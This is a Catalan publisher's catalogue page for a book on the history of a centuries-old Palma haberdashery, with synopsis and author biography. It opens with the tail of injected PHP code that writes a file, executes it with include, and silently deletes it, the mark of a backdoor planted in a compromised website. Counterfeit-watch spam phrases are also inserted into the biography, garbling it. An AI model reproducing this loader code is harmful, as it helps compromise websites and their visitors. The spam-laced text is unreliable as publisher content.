");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Ca Dona Àngela
Cercador d'Obres
ORDENAR:
Començar recerca

Ca Dona Àngela

La darrera merceria del Segell

Aguiló Pujadas, Miquel

Prologuista:
Tomàs Vibot
Col·lecció:
Papers
Tema:
Història
Pàgines:
132
PVP:
12.00
ISBN:
978-84-17113-01-8
Data d'Edició:
31/07/2017
Una botiga amb més de tres segles d’antiguitat.
Sinopsi
L’any 2007, interessat per l’antiguitat de la merceria, Aguiló va començar a estudiar els papers que havia trobat trenta anys enrere al soterrani de la botiga i va descobrir que l’establiment era més antic del que pensava son pare i del que ningú no hauria pogut imaginar.
----
El meu veïnat escoltava amb atenció els aclariments que jo li donava sobre aquell document. Quan vaig acabar, estava tan entusiasmat que va exclamar:
-Això ho has de contar, n’has de escriure un llibre!
No pensava que un tema, que considerava familiar, pogués despertar tant d’interès, anava errat.
­Aquesta és la història de la merceria de la meva família.

Llegiu l'Índex en PDF
Miquel Aguiló Pujadas
(Palma 1961). En acabar els seus estudis (col·legi Lluís Vives, 1978) comença a ajudar son pare en el negoci familiar fins a la mort d’aquest (1989), en que es fa càrrec de la botiga juntament amb sa mare. Quan aquesta es va jubilar (2000), Cheap Panerai Replica ell i la seva dona varen mantenir el negoci i l’han continuat regentant.
L’any 2007, interessat per l’antiguitat de la merceria, Panerai Replica Aguiló va començar a estudiar els papers que havia trobat trenta anys enrere al soterrani de la botiga i va descobrir que l’establiment era més antic del que pensava son pare i del que ningú no hauria pogut imaginar.Recomanar
Comentar
Comentaris (0)